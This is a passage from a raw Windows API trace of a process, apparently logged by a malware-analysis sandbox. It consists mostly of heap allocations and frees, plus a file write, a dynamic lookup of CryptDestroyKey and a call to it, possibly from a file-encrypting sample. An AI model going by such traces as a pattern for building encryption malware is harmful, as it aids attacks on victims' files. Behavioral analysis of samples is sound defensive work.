Size=0x2f608) returned 0x3c1f660 [0162.942] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x3cbd620 | out: hHeap=0x970000) returned 1 [0162.945] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0162.945] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d98 [0162.945] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x2f608) returned 0x3cbd620 [0162.951] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x3c1f660 | out: hHeap=0x970000) returned 1 [0162.953] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0162.953] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0162.953] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508a8 | out: hHeap=0x970000) returned 1 [0162.953] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50860 | out: hHeap=0x970000) returned 1 [0162.953] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0162.953] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e542d8 | out: hHeap=0x970000) returned 1 [0162.953] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a58 | out: hHeap=0x970000) returned 1 [0162.953] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a70 | out: hHeap=0x970000) returned 1 [0162.953] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a88 | out: hHeap=0x970000) returned 1 [0162.953] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ab8 | out: hHeap=0x970000) returned 1 [0162.953] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ae8 | out: hHeap=0x970000) returned 1 [0162.953] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50de8 | out: hHeap=0x970000) returned 1 [0162.953] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0162.953] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977c98 | out: hHeap=0x970000) returned 1 [0162.953] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69928 | out: hHeap=0x970000) returned 1 [0162.953] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d88 | out: hHeap=0x970000) returned 1 [0162.953] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ec0 | out: hHeap=0x970000) returned 1 [0162.953] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ef0 | out: hHeap=0x970000) returned 1 [0162.953] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54198 | out: hHeap=0x970000) returned 1 [0162.953] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0162.953] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e558d8 | out: hHeap=0x970000) returned 1 [0162.953] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50728 | out: hHeap=0x970000) returned 1 [0162.953] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506f8 | out: hHeap=0x970000) returned 1 [0162.954] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0162.954] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54558 | out: hHeap=0x970000) returned 1 [0162.954] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50908 | out: hHeap=0x970000) returned 1 [0162.954] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50950 | out: hHeap=0x970000) returned 1 [0162.954] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0162.954] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e543c8 | out: hHeap=0x970000) returned 1 [0162.954] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50938 | out: hHeap=0x970000) returned 1 [0162.954] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0162.954] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977cc8 | out: hHeap=0x970000) returned 1 [0162.954] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0162.954] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x3bf0050 | out: hHeap=0x970000) returned 1 [0162.957] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a48 | out: hHeap=0x970000) returned 1 [0162.957] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50980 | out: hHeap=0x970000) returned 1 [0162.957] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50890 | out: hHeap=0x970000) returned 1 [0162.957] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0162.957] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54080 | out: hHeap=0x970000) returned 1 [0162.957] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50758 | out: hHeap=0x970000) returned 1 [0162.957] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54148 | out: hHeap=0x970000) returned 1 [0162.957] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0162.957] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54440 | out: hHeap=0x970000) returned 1 [0162.957] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50788 | out: hHeap=0x970000) returned 1 [0162.957] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54378 | out: hHeap=0x970000) returned 1 [0162.957] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c18 | out: hHeap=0x970000) returned 1 [0162.957] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54238 | out: hHeap=0x970000) returned 1 [0162.957] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507b8 | out: hHeap=0x970000) returned 1 [0162.957] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50848 | out: hHeap=0x970000) returned 1 [0162.957] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0163.117] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 1 [0163.117] TranslateMessage (lpMsg=0x8cf708) returned 0 [0163.117] DispatchMessageW (lpMsg=0x8cf708) returned 0x0 [0163.117] KillTimer (hWnd=0x402c2, uIDEvent=0x1) returned 1 [0163.117] SetTimer (hWnd=0x402c2, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0163.118] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0163.118] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ec8 [0163.118] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0163.118] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77a08 [0163.118] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0163.118] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a08 | out: hHeap=0x970000) returned 1 [0163.118] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0163.118] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50680 [0163.118] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50518 [0163.118] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e28 [0163.118] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0163.118] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50440 [0163.118] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e58 [0163.118] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d38 [0163.118] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x2f608) returned 0x2f04008 [0163.124] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0163.124] WriteFile (in: hFile=0x2d0, lpBuffer=0x2f04008*, nNumberOfBytesToWrite=0x2f608, lpNumberOfBytesWritten=0x8cf5e4, lpOverlapped=0x0 | out: lpBuffer=0x2f04008*, lpNumberOfBytesWritten=0x8cf5e4*=0x2f608, lpOverlapped=0x0) returned 1 [0163.129] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50518 | out: hHeap=0x970000) returned 1 [0163.129] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f04008 | out: hHeap=0x970000) returned 1 [0163.129] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0163.129] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50440 | out: hHeap=0x970000) returned 1 [0163.129] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50680 | out: hHeap=0x970000) returned 1 [0163.129] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0163.129] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ec8 [0163.129] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0163.129] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77908 | out: hHeap=0x970000) returned 1 [0163.130] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a88 | out: hHeap=0x970000) returned 1 [0163.130] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77688 | out: hHeap=0x970000) returned 1 [0163.130] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0163.130] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e08 [0163.130] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e88 [0163.130] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b28 [0163.130] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b28 | out: hHeap=0x970000) returned 1 [0163.130] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0163.130] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0163.130] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504b8 [0163.130] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50440 [0163.130] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50590 [0163.130] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50680 [0163.130] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50458 [0163.130] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504d0 [0163.130] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50518 [0163.130] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e543c8 [0163.130] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504b8 | out: hHeap=0x970000) returned 1 [0163.130] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e504b8 [0163.130] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7ff80 [0163.130] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54eb8 [0163.130] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0163.131] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7ff80 | out: hHeap=0x970000) returned 1 [0163.131] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0163.131] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50530 [0163.131] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54de8 [0163.131] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50950 [0163.131] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50788 [0163.131] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dc8 [0163.131] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0163.131] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50710 [0163.131] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54300 [0163.131] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50938 [0163.131] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d98 [0163.131] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50938 | out: hHeap=0x970000) returned 1 [0163.131] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54468 [0163.131] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50848 [0163.131] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b28 [0163.131] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0163.131] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50878 [0163.131] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e08 [0163.131] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50890 [0163.131] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50830 [0163.131] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e98 [0163.132] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e542b0 [0163.132] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50908 [0163.132] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dd8 [0163.132] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50860 [0163.132] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50920 [0163.132] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e18 [0163.132] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50890 | out: hHeap=0x970000) returned 1 [0163.132] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50938 [0163.132] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50740 [0163.132] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d78 [0163.132] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fe30 [0163.132] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e28 [0163.132] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0163.132] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fe30 | out: hHeap=0x970000) returned 1 [0163.132] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0163.132] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e506e0 [0163.132] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78810 [0163.132] PeekMessageW (in: lpMsg=0x8cedb0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cedb0) returned 0 [0163.132] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e68 [0163.132] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e28 [0163.132] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0163.132] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0163.133] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0163.133] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506e0 | out: hHeap=0x970000) returned 1 [0163.133] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0163.133] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509b0 [0163.133] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d38 [0163.133] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508c0 [0163.133] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0163.133] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50728 [0163.133] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e28 [0163.133] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50890 [0163.133] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0163.133] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507a0 [0163.133] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ea8 [0163.133] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508a8 [0163.133] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0163.133] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e540f8 [0163.133] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50938 | out: hHeap=0x970000) returned 1 [0163.133] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508d8 [0163.133] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ea8 [0163.133] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0163.133] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d38 [0163.133] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50938 [0163.133] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0163.134] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506c8 [0163.134] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e38 [0163.134] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e48 [0163.134] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50968 [0163.134] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506c8 | out: hHeap=0x970000) returned 1 [0163.134] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0163.134] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50968 | out: hHeap=0x970000) returned 1 [0163.134] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0163.134] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507d0 [0163.134] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54df8 [0163.134] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50968 [0163.134] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e78 [0163.134] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ef8 [0163.134] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507b8 [0163.134] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50968 | out: hHeap=0x970000) returned 1 [0163.134] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0163.134] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507b8 | out: hHeap=0x970000) returned 1 [0163.134] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0163.134] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50758 [0163.134] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e38 [0163.134] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0163.134] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50968 [0163.135] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x2e50968, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyKey", lpUsedDefaultChar=0x0) returned 16 [0163.135] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50968 | out: hHeap=0x970000) returned 1 [0163.135] GetProcAddress (hModule=0x756e0000, lpProcName="CryptDestroyKey") returned 0x756ffa60 [0163.135] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50758 | out: hHeap=0x970000) returned 1 [0163.135] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0163.135] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50968 [0163.135] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ec8 [0163.135] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0163.135] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50968 | out: hHeap=0x970000) returned 1 [0163.135] CryptDestroyKey (hKey=0xa87310) returned 1 [0163.135] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x978490 [0163.135] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ea8 [0163.135] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54eb8 [0163.135] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50758 [0163.135] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50770 [0163.135] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50968 [0163.136] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dc8 [0163.136] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50968 | out: hHeap=0x970000) returned 1 [0163.136] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0163.136] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50770 | out: hHeap=0x970000) returned 1 [0163.136] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507e8 [0163.136] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50968 [0163.136] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50980 [0163.136] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54da8 [0163.136] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50980 | out: hHeap=0x970000) returned 1 [0163.136] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0163.136] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50968 | out: hHeap=0x970000) returned 1 [0163.136] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0163.136] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507d0 | out: hHeap=0x970000) returned 1 [0163.136] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50938 | out: hHeap=0x970000) returned 1 [0163.136] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0163.136] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50740 | out: hHeap=0x970000) returned 1 [0163.136] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508c0 | out: hHeap=0x970000) returned 1 [0163.136] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509b0 | out: hHeap=0x970000) returned 1 [0163.136] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50890 | out: hHeap=0x970000) returned 1 [0163.136] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50728 | out: hHeap=0x970000) returned 1 [0163.136] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508a8 | out: hHeap=0x970000) returned 1 [0163.136] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507a0 | out: hHeap=0x970000) returned 1 [0163.137] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508d8 | out: hHeap=0x970000) returned 1 [0163.137] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e540f8 | out: hHeap=0x970000) returned 1 [0163.137] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0163.137] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50830 | out: hHeap=0x970000) returned 1 [0163.137] HeapFree (in: hHeap=0x970000, 